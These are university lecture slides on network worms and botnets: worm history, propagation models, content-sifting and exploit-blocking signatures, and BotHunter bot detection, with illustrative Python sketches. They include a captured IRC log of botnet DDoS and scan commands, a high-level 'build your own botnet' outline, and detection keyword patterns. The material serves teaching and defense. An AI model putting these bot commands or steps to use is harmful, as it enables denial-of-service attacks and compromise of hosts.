Spring 2008 CS 155 Network Worms and Bots John Mitchell Outline Worms Worm examples and propagation methods Detection methods Traffic patterns: EarlyBird Vulnerabilities: Generic Exploit Blocking Disabling.
CS 155
Network Worms and Bots
John Mitchell Spring 2008
Outline
Worms
  Worm examples and propagation methods
  Detection methods
    Traffic patterns: EarlyBird
    Vulnerabilities: Generic Exploit Blocking
  Disabling worms
    Generate signatures for network or host-based filters
Bots
  Structure and use of bots
  Recognizing bot propagation
  Recognizing bot operation
    Network-based methods
    Host-based methods
Worm
A worm is self-replicating software designed to spread through the network
  Typically exploits security flaws in widely used services
  Can cause enormous damage
    Launch DDoS attacks, install bot networks
    Access sensitive information
    Cause confusion by corrupting the sensitive information
Worm vs Virus vs Trojan horse
  A virus is code embedded in a file or program
  Viruses and Trojan horses rely on human intervention
  Worms are self-contained and may spread autonomously
Cost of worm attacks
Morris worm, 1988
  Infected approximately 6,000 machines
    10% of computers connected to the Internet
  Cost ~ $10 million in downtime and cleanup
Code Red worm, July 16 2001
  Direct descendant of Morris’ worm
  Infected more than 500,000 servers
  Programmed to go into infinite sleep mode July 28
  Caused ~ $2.6 billion in damages
Love Bug worm: $8.75 billion
Statistics: Computer Economics Inc., Carlsbad, California
Internet Worm (first major attack)
Released November 1988
  Program spread through Digital, Sun workstations
  Exploited Unix security vulnerabilities
    VAX computers and SUN-3 workstations running versions 4.2 and 4.3 Berkeley UNIX code
Consequences
  No immediate damage from program itself
  Replication and threat of damage
    Load on network, systems used in attack
    Many systems shut down to prevent further attack
Some historical worms of note
Worm      Date   Distinction
Morris    11/88  Used multiple vulnerabilities, propagate to “nearby” sys
ADM       5/98   Random scanning of IP address space
Ramen     1/01   Exploited three vulnerabilities
Lion      3/01   Stealthy, rootkit worm
Cheese    6/01   Vigilante worm that secured vulnerable systems
Code Red  7/01   First sig Windows worm; completely memory resident
Walk      8/01   Recompiled source code locally
Nimda     9/01   Windows worm: client-to-server, c-to-c, s-to-s, …
Scalper   6/02   11 days after announcement of vulnerability; peer-to-peer network of compromised systems
Slammer   1/03   Used a single UDP packet for explosive growth
Kienzle and Elder
Increasing propagation speed
Code Red, July 2001
  Affects Microsoft Index Server 2.0 and the Windows 2000 Indexing service, on Windows NT 4.0 and Windows 2000 systems that run IIS 4.0 and 5.0 Web servers
  Exploits known buffer overflow in Idq.dll
  Vulnerable population (360,000 servers) infected in 14 hours
SQL Slammer, January 2003
  Affects Microsoft SQL 2000
  Exploits known buffer overflow vulnerability
    Server Resolution service vulnerability reported June 2002
    Patch released in July 2002, Bulletin MS02-039
  Vulnerable population infected in less than 10 minutes
Code Red
Initial version released July 13, 2001
  Sends its code as an HTTP request
  HTTP request exploits buffer overflow
  Malicious code is not stored in a file
    Placed in memory and then run
When executed,
  Worm checks for the file C:\Notworm
    If file exists, the worm thread goes into infinite sleep state
  Creates new threads
    If the date is before the 20th of the month, the next 99 threads attempt to exploit more computers by targeting random IP addresses
Code Red of July 13 and July 19
Initial release of July 13
  1st through 20th of each month: spread via random scan of 32-bit IP addr space
  20th through end of each month: attack
    Flooding attack against 198.137.240.91 (www.whitehouse.gov)
  Failure to seed random number generator leads to linear growth
Revision released July 19, 2001
  White House responds to threat of flooding attack by changing the address of www.whitehouse.gov
  Causes Code Red to die for date ≥ 20th of the month
  But: this time random number generator correctly seeded
Slides: Vern Paxson
Measuring activity: network telescope
Monitor cross-section of Internet address space, measure traffic
  “Backscatter” from DOS floods
  Attackers probing blindly
  Random scanning from worms
LBNL’s cross-section: 1/32,768 of Internet
UCSD, UWisc’s cross-section: 1/256
Spread of Code Red
Network telescopes estimate of # infected hosts: 360K. (Beware DHCP & NAT)
Course of infection fits classic logistic.
Note: the larger the vulnerable population, the faster the worm spreads.
That night (20th), worm dies … except for hosts with inaccurate clocks!
It just takes one of these to restart the worm on August 1st …
Slides: Vern Paxson
Code Red 2
Released August 4, 2001.
Comment in code: “Code Red 2.” But in fact completely different code base.
Payload: a root backdoor, resilient to reboots.
Bug: crashes NT, only works on Windows 2000.
Localized scanning: prefers nearby addresses.
Kills Code Red 1.
Safety valve: programmed to die Oct 1, 2001.
Slides: Vern Paxson
Striving for Greater Virulence: Nimda
Released September 18, 2001.
Multi-mode spreading:
  attack IIS servers via infected clients
  email itself to address book as a virus
  copy itself across open network shares
  modifying Web pages on infected servers w/ client exploit
  scanning for Code Red II backdoors (!)
worms form an ecosystem!
Leaped across firewalls.
Slides: Vern Paxson
[Figure annotations: CR 1 returns thanks to bad clocks; Code Red 2 kills off Code Red 1; Code Red 2 settles into weekly pattern; Nimda enters the ecosystem; Code Red 2 dies off as programmed. Slides: Vern Paxson]
How do worms propagate?
Scanning worms
  Worm chooses “random” address
Coordinated scanning
  Different worm instances scan different addresses
Flash worms
  Assemble tree of vulnerable hosts in advance, propagate along tree
  Not observed in the wild, yet
  Potential for 10^6 hosts in < 2 sec! [Staniford]
Meta-server worm
  Ask server for hosts to infect (e.g., Google for “powered by phpbb”)
Topological worm
  Use information from infected hosts (web server logs, email address books, config files, SSH “known hosts”)
Contagion worm
  Propagate parasitically along with normally initiated communication
How fast are scanning worms?
Model propagation as infectious epidemic
Simplest version: homogeneous random contacts
  N: population size
  S(t): susceptible hosts at time t
  I(t): infected hosts at time t
  β: contact rate
  i(t) = I(t)/N, s(t) = S(t)/N
$$\frac{dI}{dt} = \beta \frac{I S}{N}, \qquad \frac{dS}{dt} = -\beta \frac{I S}{N}$$
$$\frac{di}{dt} = \beta\, i\,(1 - i)$$
$$i(t) = \frac{e^{\beta (t - T)}}{1 + e^{\beta (t - T)}}$$
where T is the time at which i = 1/2.
courtesy Paxson, Staniford, Weaver
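A minimal sketch of this model, comparing a forward-Euler integration of di/dt = βi(1 − i) with the closed-form logistic curve. The contact rate, the initial infected fraction, and the step size are hypothetical values chosen only for illustration; they are not taken from the slides.

```python
import math


def logistic_fraction(t, beta, T):
    """Closed form i(t) = e^{beta (t - T)} / (1 + e^{beta (t - T)})."""
    return 1.0 / (1.0 + math.exp(-beta * (t - T)))


def simulate_si(beta, i0, dt, steps):
    """Forward-Euler integration of di/dt = beta * i * (1 - i)."""
    i = i0
    trace = [i]
    for _ in range(steps):
        i += dt * beta * i * (1.0 - i)
        trace.append(i)
    return trace


if __name__ == "__main__":
    beta = 1.8            # hypothetical contact rate (per hour)
    i0 = 1.0 / 360_000    # hypothetical: one infected host at t = 0
    # T is fixed by the initial condition i(0) = i0.
    T = math.log((1.0 - i0) / i0) / beta
    trace = simulate_si(beta, i0, dt=0.001, steps=14_000)
    for hour in (0, 4, 8, 12):
        print(hour, trace[hour * 1000], logistic_fraction(hour, beta, T))
```

The two columns should track each other closely: slow start, explosive middle, saturation as the susceptible population runs out.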
Shortcomings of simplified model
Prediction is faster than observed propagation
Possible reasons
  Model ignores infection time, network delays
  Ignores reduction in vulnerable hosts by patching
Model supports unrealistic conclusions
  Example: When the Top-100 ISPs deploy containment strategies, they still cannot prevent a worm spreading at 100 probes/sec from affecting 18% of the Internet, no matter what the reaction time of the system towards containment
Analytical Active Worm Propagation Model
[Chen et al., Infocom 2003]
More detailed discrete time model
  Assume infection propagates in one time step
Notation
  N – number of vulnerable machines
  h – “hitlist”: number of infected hosts at start
  s – scanning rate: # of machines scanned per infection
  d – death rate: infections detected and eliminated
  p – patching rate: vulnerable machines become invulnerable
  At time i, n_i are infected and m_i are vulnerable
Discrete time difference equation
  Guess random IP addr, so infection probability (m_i - n_i)/2^32
  Number infected reduced by p n_i + d n_i
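The slide does not reproduce the difference equation itself, so the following is only a sketch built from the terms listed above. It assumes each of the m_i − n_i uninfected vulnerable hosts is hit by at least one of the s·n_i random scans with probability 1 − (1 − 1/2^32)^(s·n_i), that infections are reduced by (d + p)·n_i per step, and that the vulnerable pool shrinks by a factor (1 − p) per step. The function name and the exact update form are assumptions, not the paper's code.

```python
import math


def aawp_sketch(N, h, s, d, p, steps, addr_space=2 ** 32):
    """Discrete-time worm propagation sketch (one infection wave per step)."""
    n = float(h)   # n_i: infected hosts
    m = float(N)   # m_i: vulnerable hosts, infected or not
    history = [n]
    for _ in range(steps):
        scans = s * n
        # Probability that a given address receives at least one scan.
        hit_prob = -math.expm1(scans * math.log1p(-1.0 / addr_space))
        newly_infected = (m - n) * hit_prob
        n = n + newly_infected - (d + p) * n
        m = (1.0 - p) * m
        n = max(0.0, min(n, m))
        history.append(n)
    return history


if __name__ == "__main__":
    # Parameters echo the plot caption: 1M vulnerable machines, 100 scans/sec,
    # death rate 0.001/sec; the hitlist size and patching rate are hypothetical.
    curve = aawp_sketch(N=1_000_000, h=100, s=100, d=0.001, p=0.0005, steps=1000)
    print(max(curve))
```

Varying `h` and `p` in this sketch shows the qualitative effects named on the next slide: a larger hitlist shortens the slow start, and a higher patching rate lowers the peak.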
Effect of parameters on propagation
  1. HitList Size
  2. Patching Rate
  3. Time to Complete Infection
(Plots are for 1M vulnerable machines, 100 scans/sec, death rate 0.001/second)
Other models:
  Wang et al, Modeling Timing Parameters … , WORM ’04 (includes delay)
  Ganesh et al, The Effect of Network Topology … , Infocom 2005 (topology)
Worm Detection and Defense
Detect via honeyfarms: collections of “honeypots” fed by a network telescope.
  Any outbound connection from honeyfarm = worm. (at least, that’s the theory)
  Distill signature from inbound/outbound traffic.
  If telescope covers N addresses, expect detection when worm has infected 1/N of population.
Thwart via scan suppressors: network elements that block traffic from hosts that make failed connection attempts to too many other hosts
5 minutes to several weeks to write a signature
Several hours or more for testing
Need for automation
Current threats can spread faster than defenses can react
Manual capture/analyze/signature/rollout model too slow
[Figure: contagion period and signature response period, 1990 to 2005, on a time scale running from months through days, hrs, and mins to secs. Threats shown: program viruses, macro viruses, e-mail worms, network worms, flash worms. Response shown pre-automation and post-automation.]
Slide: Carey Nachenberg, Symantec
Signature inference
Challenge
  Need to automatically learn a content “signature” for each new worm, potentially in less than a second!
Some proposed solutions
  Singh et al, Automated Worm Fingerprinting, OSDI ’04
  Kim et al, Autograph: Toward Automated, Distributed Worm Signature Detection, USENIX Sec ’04
Signature inference
Monitor network and look for strings common to traffic with worm-like behavior
Signatures can then be used for content filtering
Slide: S Savage
Content sifting
Assume there exists some (relatively) unique invariant bitstring W across all instances of a particular worm (true today, not tomorrow...)
Two consequences
  Content Prevalence: W will be more common in traffic than other bitstrings of the same length
  Address Dispersion: the set of packets containing W will address a disproportionate number of distinct sources and destinations
Content sifting: find W’s with high content prevalence and high address dispersion and drop that traffic
Slide: S Savage
Observation: High-prevalence strings are rare
[Figure: distribution of 40-byte substrings by number of repeats. x-axis: Number of repeats, log scale from 1 to 100000; y-axis ticks from 0.984 to 1.]
Only 0.6% of the 40-byte substrings repeat more than 3 times in a minute
The basic algorithm
[Figure sequence: a detector in the network watches traffic among hosts A, B, C, D, E and cnn.com. It maintains a Prevalence Table (one counter per content string) and an Address Dispersion Table (distinct sources and destinations per content string).]
  Step 1: both tables empty
  Step 2: first string: prevalence 1; sources 1 (A); destinations 1 (B)
  Step 3: second string: prevalence 1; sources 1 (C); destinations 1 (A)
  Step 4: first string: prevalence 2; sources 2 (A,B); destinations 2 (B,D)
  Step 5: first string: prevalence 3; sources 3 (A,B,D); destinations 3 (B,D,E); second string unchanged
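The table updates in this walkthrough can be sketched with exact (naive) data structures. This is only an illustration of the idea, assuming whole-payload strings as keys and hypothetical thresholds of 3; the real system replaces these dictionaries and sets with the hashing, sampling, and approximate counters described on the following slides.

```python
from collections import defaultdict


class ContentSifter:
    """Naive content sifting: exact counters and exact address sets."""

    def __init__(self, prevalence_threshold=3, dispersion_threshold=3):
        self.prevalence_threshold = prevalence_threshold
        self.dispersion_threshold = dispersion_threshold
        self.prevalence = defaultdict(int)     # content -> repeat count
        self.sources = defaultdict(set)        # content -> distinct sources
        self.destinations = defaultdict(set)   # content -> distinct destinations

    def observe(self, src, dst, content):
        """Record one packet; return True if the content looks worm-like."""
        self.prevalence[content] += 1
        self.sources[content].add(src)
        self.destinations[content].add(dst)
        return (
            self.prevalence[content] >= self.prevalence_threshold
            and len(self.sources[content]) >= self.dispersion_threshold
            and len(self.destinations[content]) >= self.dispersion_threshold
        )


if __name__ == "__main__":
    sifter = ContentSifter()
    packets = [("A", "B", "worm"), ("C", "A", "news"),
               ("B", "D", "worm"), ("D", "E", "worm")]
    for src, dst, content in packets:
        print(src, dst, content, sifter.observe(src, dst, content))
```

Only the last packet crosses all three thresholds, matching the final step of the walkthrough.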
Challenges
Computation
  To support a 1Gbps line rate we have 12us to process each packet, at 10Gbps 1.2us, at 40Gbps…
  Dominated by memory references; state expensive
  Content sifting requires looking at every byte in a packet
State
  On a fully-loaded 1Gbps link a naïve implementation can easily consume 100MB/sec for table
  Computation/memory duality: on high-speed (ASIC) implementation, latency requirements may limit state to on-chip SRAM
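The per-packet budgets can be reproduced with a one-line calculation, assuming a 1500-byte packet. The packet size is an assumption; the slide does not state it, but it is the size that yields the 12us figure.

```python
def per_packet_budget_us(link_bps, packet_bytes=1500):
    """Time in microseconds to receive one packet at the given line rate."""
    return packet_bytes * 8 / link_bps * 1e6


if __name__ == "__main__":
    for gbps in (1, 10, 40):
        print(gbps, "Gbps:", per_packet_budget_us(gbps * 1e9), "us")
```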
Which substrings to index?
Approach 1: Index all substrings
Way too many substrings: too much computation, too much state
Approach 2: Index whole packet
Very fast but trivially evadable (e.g., Witty, Email Viruses)
Approach 3: Index all contiguous substrings of a fixed length ‘S’
Can capture all signatures of length ‘S’ and larger
[Figure: packets P1 and P2 over the byte string A B C D E F G H I J K]
How to represent substrings?
Store hash instead of literal to reduce state
Incremental hash to reduce computation
Rabin fingerprint is one such efficient incremental hash function [Rabin81, Manber94]
  One multiplication, addition and mask per byte
R A N D A B C D O M    Fingerprint = 11000000
R A B C D A N D O M    Fingerprint = 11000000
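The incremental property can be illustrated with a simple polynomial rolling hash. Note that this is a Rabin-Karp-style hash modulo 2^32, swapped in for readability; it is not a true Rabin fingerprint over GF(2), and the base and mask are arbitrary illustrative choices.

```python
def rolling_fingerprints(data, window, base=257, mask=(1 << 32) - 1):
    """Return the hash of every contiguous `window`-byte substring of `data`.

    After the first window, each new hash costs a constant number of
    multiplications, additions, and masks, independent of the window size.
    """
    if len(data) < window:
        return []
    top = pow(base, window - 1, mask + 1)   # weight of the outgoing byte
    h = 0
    for b in data[:window]:
        h = (h * base + b) & mask
    out = [h]
    for i in range(window, len(data)):
        h = (h - data[i - window] * top) & mask   # drop the oldest byte
        h = (h * base + data[i]) & mask           # shift in the newest byte
        out.append(h)
    return out


if __name__ == "__main__":
    p1 = rolling_fingerprints(b"RANDABCDOM", 4)
    p2 = rolling_fingerprints(b"RABCDANDOM", 4)
    # "ABCD" starts at offset 4 in the first packet and offset 1 in the second.
    print(p1[4] == p2[1])
```

Because the hash depends only on the bytes in the window, the substring "ABCD" gets the same fingerprint at either offset, which is what lets the detector match a worm payload regardless of where it sits in a packet.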
How to subsample?
Approach 1: sample packets
If we choose 1 in N, detection will be slowed by N
Approach 2: sample at particular byte offsets
  Susceptible to simple evasion attacks
  No guarantee that we will sample same sub-string in every packet
Approach 3: sample based on the hash of the substring
Finding “heavy hitters” via Multistage Filters
[Figure: field extraction feeds Hash 1, Hash 2, and Hash 3; each hash increments a counter in its own stage (Stage 1, Stage 2, Stage 3); a comparator per stage checks the counter against the threshold; ALERT if all counters are above threshold.]
Multistage filters in action
[Figure: counters in Stage 1, Stage 2, and Stage 3 against a threshold. Grey = other hashes, Yellow = rare hash, Green = common hash.]
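A minimal sketch of a multistage filter follows. The stage count, table size, threshold, and the use of salted BLAKE2 as the per-stage hash are all assumptions made for illustration; a hardware implementation would use much cheaper hash functions.

```python
import hashlib


class MultistageFilter:
    """Parallel multistage filter: a key is reported only when its counter
    in every stage has reached the threshold."""

    def __init__(self, stages=3, counters_per_stage=1024, threshold=3):
        self.size = counters_per_stage
        self.threshold = threshold
        self.tables = [[0] * counters_per_stage for _ in range(stages)]

    def _index(self, stage, key):
        # An independent hash per stage, derived by salting with the stage number.
        digest = hashlib.blake2b(key, digest_size=8, salt=bytes([stage])).digest()
        return int.from_bytes(digest, "big") % self.size

    def add(self, key):
        """Count one occurrence of `key`; return True if all stages are at threshold."""
        all_above = True
        for stage, table in enumerate(self.tables):
            idx = self._index(stage, key)
            table[idx] += 1
            if table[idx] < self.threshold:
                all_above = False
        return all_above


if __name__ == "__main__":
    f = MultistageFilter()
    print([f.add(b"common substring hash") for _ in range(3)])
    print(f.add(b"rare substring hash"))
```

A string that truly repeats at least `threshold` times always passes, so there are no false negatives. A rare string passes only if it collides with busy counters in every stage at once, which is why adding stages drives the false positive rate down.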
Observation: High address dispersion is rare too
Naïve implementation might maintain a list of sources (or destinations) for each string hash
But dispersion only matters if it’s over threshold
  Approximate counting may suffice
  Trades accuracy for state in data structure
Scalable Bitmap Counters
  Similar to multi-resolution bitmaps [Estan03]
  Reduce memory by 5x for modest accuracy error
Scalable Bitmap Counters
[Figure: Hash(Source) sets a bit in the bitmap]
  Hash: based on Source (or Destination)
  Sample: keep only a sample of the bitmap
  Estimate: scale up sampled count
  Adapt: periodically increase scaling factor
  Error Factor = 2/(2^numBitmaps - 1)
  With 3 32-bit bitmaps, error factor = 2/7 ≈ 28.5%
Content sifting summary
  Index fixed-length substrings using incremental hashes
  Subsample hashes as function of hash value
  Multi-stage filters to filter out uncommon strings
  Scalable bitmaps to tell if number of distinct addresses per hash crosses threshold
  This is fast enough to implement
Experience
Quite good.
  Detected and automatically generated signatures for every known worm outbreak over eight months
  Can produce a precise signature for a new worm in a fraction of a second
  Software implementation keeps up with 200Mbps
Known worms detected: Code Red, Nimda, WebDav, Slammer, Opaserv, …
Unknown worms (with no public signatures) detected: MsBlaster, Bagle, Sasser, Kibvu, …
False Positives
Common protocol headers
  Mainly HTTP and SMTP headers
  Distributed (P2P) system protocol headers
  Procedural whitelist
    Small number of popular protocols
Non-worm epidemic activity
  SPAM
  BitTorrent
GNUTELLA.CONNECT/0.6..X-Max-TTL:.3..X-Dynamic-Querying:.0.1..X-Version:.4.0.4..X-Query-Routing:.0.1..User-Agent:.LimeWire/4.0.6..Vendor-Message:.0.1..X-Ultrapeer-Query-Routing:
Generic Exploit Blocking
Idea
  Write a network IPS signature to generically detect and block all future attacks on a vulnerability
  Different from writing a signature for a specific exploit!
Step #1: Characterize the vulnerability “shape”
  Identify fields, services or protocol states that must be present in attack traffic to exploit the vulnerability
  Identify data footprint size required to exploit the vulnerability
  Identify locality of data footprint; will it be localized or spread across the flow?
Step #2: Write a generic signature that can detect data that “mates” with the vulnerability shape
Similar to Shield research from Microsoft
Slide: Carey Nachenberg, Symantec
Generic Exploit Blocking Example #1
Consider MS02-039 Vulnerability (SQL Buffer Overflow):
Field/service/protocol
  UDP port 1434
  Packet type: 4
Minimum data footprint
  Packet size > 60 bytes
Data Localization
  Limited to a single packet
Pseudo-signature:
  if (packet.port() == 1434 && packet.size() > 60) { report_exploit(MS02-039); }
Sample signature:
  BEGIN
  NAME: MS SQL Vuln
  TRIGGER: ANY:ANY->ANY:1434
  …
  END
Slide: Carey Nachenberg, Symantec
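The vulnerability shape for this example can be sketched as a predicate over a single packet. The function name and argument layout are hypothetical, and the sketch assumes that the "packet type" is the first byte of the UDP payload; the slide lists the type as part of the shape but does not say where in the packet it is encoded.

```python
def matches_ms02_039_shape(protocol, dst_port, payload):
    """Return True if a packet fits the MS02-039 vulnerability shape.

    Shape from the slide: UDP port 1434, packet type 4, more than 60 bytes,
    confined to a single packet. Nothing exploit-specific is examined.
    """
    return (
        protocol == "udp"
        and dst_port == 1434
        and len(payload) > 60
        and payload[0] == 0x04   # assumption: type is the first payload byte
    )


if __name__ == "__main__":
    attack_like = b"\x04" + b"A" * 100
    print(matches_ms02_039_shape("udp", 1434, attack_like))
    print(matches_ms02_039_shape("udp", 1434, b"\x04short"))
```

The check never looks at the exploit payload itself, only at the properties any exploit of this flaw must have, which is what distinguishes it from a signature for one specific worm.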
Generic Exploit Blocking Example #2
Consider MS03-026 Vulnerability (RPC Buffer Overflow):
Field/service/protocol
  RPC request on TCP/UDP 135
  szName field in CoGetInstanceFromFile func.
Minimum data footprint
  Arguments > 62 bytes
Data Localization
  Limited to 256 bytes from start of RPC bind command
Pseudo-signature:
  if (port == 135 && type == request && func == CoGetInstanceFromFile && parameters.length() > 62) { report_exploit(MS03-026); }
Sample signature:
  BEGIN
  NAME: RPC Vulnerability
  TRANSIT-TYPE: TCP, UDP
  \x00\x00.*\x05\x00
  …
  END
Slide: Carey Nachenberg, Symantec
Worm summary
Worm attacks
  Many ways for worms to propagate
  Propagation speed is increasing
  Polymorphic worms, other barriers to detection
Detect
  Traffic patterns: EarlyBird
  Watch attack: TaintCheck and Sting
  Look at vulnerabilities: Generic Exploit Blocking
Disable
  Generate worm signatures and use in network or host-based filters
Botnet
Collection of compromised hosts
  Spread like worms and viruses
  Once installed, respond to remote commands
Platform for many attacks
  Spam forwarding (70% of all spam?)
  Click fraud
  Keystroke logging
  Distributed denial of service attacks
Serious problem
  Top concern of banks, online merchants
  Vint Cerf: ¼ of hosts connected to Internet
What are botnets used for?
capability: create port redirect; other proxy; download file from web; DNS resolution; UDP/ping floods; other DDoS floods; scan/spread; spam; visit URL
ago:   √ √ √ √ √ √ √ √ √
DSNX:  √ √ √
evil:  √
G-SyS: √ √ √ √ √ √ √
sd:    √
Spy:   √ √ √ √ √ √ √ √ √
Capabilities are exercised via remote commands.
Building a Bot Network
[Figure: the attacker makes compromise attempts against four hosts: Win XP, FreeBSD, Mac OS X, Win XP.]
[Figure: the two Win XP hosts are compromised and the attacker installs bot software on each; the attempts against FreeBSD and Mac OS X remain attempts.]
Step 2
Each compromised Win XP host runs:
  . . .
  /connect jade.va.us.dal.net
  /join #hacker
  . . .
[Figure: three Win XP bots connected to the IRC server jade.va.dal.net]
Step 3
(12:59:27pm) -- A9-pcgbdv ([email protected]) has joined (#owned) Users : 1646
(12:59:27pm) (@PhaTTy) .ddos.synflood 216.209.82.62
(12:59:27pm) -- A6-bpxufrd (A6-bpxufrd@wp95 81.introweb.nl) has joined (#owned) Users : 1647
(12:59:27pm) -- A9-nzmpah ([email protected]) has left IRC (Connection reset by peer)
(12:59:28pm) (@PhaTTy) .scan.enable DCOM
(12:59:28pm) -- A9-tzrkeasv ([email protected]) has joined (#owned) Users : 1650
• Spam service
• Rent-a-bot
• Cash-out
• Pump and dump
• Botnet rental
Underground commerce
Market in access to bots
  Botherd: Collects and manages bots
  Access to proxies (“peas”) sold to spammers, often with commercial-looking web interface
Sample rates
  Non-exclusive access to botnet: 10¢ per machine
  Exclusive access: 25¢
  Payment via compromised account (e.g. PayPal) or cash to dropbox
Identity Theft
  Keystroke logging
  Complete identities available for $25 - $200+
    Rates depend on financial situation of compromised person
    Include all info from PC files, plus all websites of interest with passwords/account info used by PC owner
    At $200+, usually includes full credit report
[Lloyd Taylor, Keynote Systems, SFBay InfraGard Board]
Sobig.a In Action
Arrives as an email attachment
  Written in C++
  Encrypted with Telock to slow analysis
User opens attachment, launching trojan
  Downloads file from a free Geocities account
  Contains list of URLs pointing to second stage
Fetches second-stage trojan
  Arbitrary executable file – could be anything
  For Sobig.a, second-stage trojan is Lala
Stage 2 – Lala
Communication
  Lala notifies a cgi script on a compromised host
  Different versions of Lala have different sites and cgi scripts, perhaps indicating tracking by author
Installation
  Lala installs a keylogger and password-protected Lithium remote access trojan.
  Lala downloads Stage 3 trojan
    Wingate proxy (commercial software)
Cleanup
  Lala removes the Sobig.a trojan
Stage 3 – Wingate
Wingate is a general-purpose port proxy server
  555/TCP – RTSP
  608/TCP – Remote Control Service
  1180/TCP – SOCKS
  1181/TCP – Telnet Proxy
  1182/TCP – WWW Proxy
  1183/TCP – FTP Proxy
  1184/TCP – POP3 Proxy
  1185/TCP – SMTP Server
Final state of compromised machine
  Complete remote control by Lithium client with password “adm123”
  Complete logging of user’s keystrokes
  Usable for spam relay, http redirects
  Wingate Gatekeeper client can connect to 608/TCP, can log/change everything
Build Your Own Botnet
Pick a vector mechanism
  IRC Channels: DCC Filesends, Website Adverts to Exploit Sites
  Scan & Sploit: MSBlast
  Trojan: SoBig/BugBear/ActiveX Exploits
Choose a Payload
  Backdoors
    Agobot, SubSeven, DeepThroat
    Most include mechanisms for DDoS, self-spreading, download/exec arbitrary code, password stealers.
Do it
  Compromise an IRC server, or use your own zombied machines
  Configure Payload to connect to selected server
  Load encryption keys and codes
  Release through appropriate compromised systems
  Sit back and wait, or start on your next Botnet
[Lloyd Taylor, Keynote Systems, SFBay InfraGard Board]
Bot detection methods
Signature-based (most AV products)
Rule-based
  Monitor outbound network connections (e.g. ZoneAlarm, BINDER)
  Block certain ports (25, 6667, ...)
Hybrid: content-based filtering
  Match network packet contents to known command strings (keywords)
  E.g. Gaobot ddos cmds: .ddos.httpflood
Network traffic monitoring
  Wenke Lee, Phil Porras: Bot Hunter, …
    Correlate various NIDS alarms to identify “bot infection sequence”
  GA Tech: Recognize traffic patterns associated with ddns-based rallying
  Stuart Staniford, FireEye
    Detect port scanning to identify suspicious traffic
    Emulate host with taint tracking to identify exploit
A Cyber-TA Distributed Correlation Example
  Introduction
  Approaches to Privacy-Preserving Correlation
  botHunter
    What is botHunter?
    A Real Case Study
    Behavior-based Correlation
    Architectural Overview
    botHunter Sensors
    Correlation Framework
    Example botHunter Output
    Cyber-TA Integration
BotHunter: passive bot detection
Snort-based sensor suite for malware event detection
  inbound scan detection
  remote to local exploit detection
  anomaly detection system for exploits over key TCP protocols
  Botnet specific egg download banners
  Victim-to-C&C-based communications exchanges, particularly for IRC bot protocols
Event correlator
  combines information from sensors to recognize bots that infect and coordinate with your internal network assets
  Submits “bot-detection profiles” to the Cyber-TA repository infrastructure
E1: Inbound Scan (A-2-V)
E2: Inbound Infection (A-2-V)
E3: Egg Download (V-2-A)
E4: C&C Comms (V-2-C)
E5: Outbound Scan
• Search for duplex communication sequences that are indicative of infection-coordination-infection lifecycle
Phatbot infection lifecycle
A: Attack, V: Victim, C: C&C Server
E1: A.* -> V.{2745, 135, 1025, 445, 3127, 6129, 139, 5000} (Bagle, DCOM2, DCOM, NETBIOS, DOOM, DW, NETBIOS, UPNP … TCP connections w/out content transfers)
E2: A.* -> V.135 (Windows DCE RPC exploit in payload)
E3: V.* -> A.31373 (transfer a relatively large file via random A port specified by exploit)
E4: V.* -> C.6668 (connect to an IRC server)
E5: V.* -> V'.{2745, 135, 1025, 445, 3127, 6129, 139, 5000} (V begins search for new infection targets, listens on 11759 for future egg downloads)
Captured in a controlled VMWare environment
Botnets: Architecture Overview
BotHunter System Architecture
  Input: span port to Ethernet device
  Snort 2.6.0 sensors
    SLADE (spp_scade.c|h): e2: Payload Anomalies
    SCADE (spp_scade.c|h): e1: Inbound Malware Scans; e5: Outbound Scans
    Signature Engine with botHunter Ruleset: e2: Exploits; e3: Egg Downloads; e4: C&C Traffic
  Configuration: bothunter.config, bothunter.XML
  botHunter Correlator (Java 1.4.2), CTA Anonymizer Plugin
  Output: bot Infection Profile:
    • Confidence Score
    • Victim IP
    • Attacker IP List (by confidence)
    • Coordination Center IP (by confidence)
    • Full Evidence Trail: Sigs, Scores, Ports
    • Infection Time Range
  Snort +2.6.0, OS: Linux, MacOS, Win, FreeBSD, Solaris, Java +1.4.2
botHunter Signature Set
Replace standard snort rules
  Five custom rulesets: e[1-5].rules
Scope
  known worm/bot exploit general traffic signatures, shell/code/script exploits, update/download/registered rules, C&C command exchanges, outbound scans, malware exploits
Rule sources
  Bleeding Edge malware rulesets
  Snort Community Rules, Snort Registered Free Set
  Cyber-TA Custom bot-specific rules
Current Set: 237 rules, operating on SRI/CSL and GA Tech networks, relatively low false positive rate
Detection – Correlation Framework
Bot-State Correlation Data Structure
  VictimIP | E1 | E2 | E3 | E4 | E5 | Score
  Rows: valid internal Home_Net IP
  Columns: bot infection stages
  Entry: IP addresses that contributed alerts to E-column
  Score column: cumulative score per row
  Threshold: (row_score > threshold) declares bot
  InitTime Triggers: an event that initiates the pruning timer
  Pruning Timer: seconds remaining until a row is reinitialized
Characteristics of Bot Declarations
  • states are triggered in any order, but pruning timer reinitializes row state once an InitTime Trigger is activated
  • external stimulus alone cannot trigger bot alert
  • 2 x internal bot behavior triggers bot alert
  • When bot alert is declared, IP addresses are assigned responsibility based on raw contribution
Defaults:
  E1 – Inbound scan detected, weight = .25
  E2 – Inbound exploit detected, weight = .25
  E3 – Egg download detected, weight = .50
  E4 – C&C channel detected, weight = .50
  E5 – Outbound scan detected, weight = .50
  Threshold = 1.0
  Pruning Interval = 120 seconds
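A rough sketch of the scoring table with these defaults. The class and method names are hypothetical, and two simplifications are assumptions: the pruning timer starts at the first event recorded for a victim (standing in for the InitTime trigger), and the comparison is "score >= threshold" rather than the strict ">" written on the slide, so that two internal behaviors (0.50 + 0.50) are enough to declare a bot, as the slide says they should be.

```python
WEIGHTS = {"E1": 0.25, "E2": 0.25, "E3": 0.50, "E4": 0.50, "E5": 0.50}
THRESHOLD = 1.0
PRUNING_INTERVAL = 120.0  # seconds


class BotCorrelator:
    """One row per internal victim IP; each stage is scored at most once."""

    def __init__(self):
        self.rows = {}  # victim_ip -> {"events": {stage: set of peer IPs}, "expires": time}

    def report(self, victim_ip, stage, peer_ip, now):
        """Record a sensor alert; return True if the row now declares a bot."""
        row = self.rows.get(victim_ip)
        if row is None or now >= row["expires"]:
            # Start (or reinitialize) the row and its pruning timer.
            row = {"events": {}, "expires": now + PRUNING_INTERVAL}
            self.rows[victim_ip] = row
        row["events"].setdefault(stage, set()).add(peer_ip)
        score = sum(WEIGHTS[s] for s in row["events"])
        return score >= THRESHOLD


if __name__ == "__main__":
    c = BotCorrelator()
    print(c.report("10.0.0.5", "E1", "192.0.2.1", now=0.0))   # inbound scan
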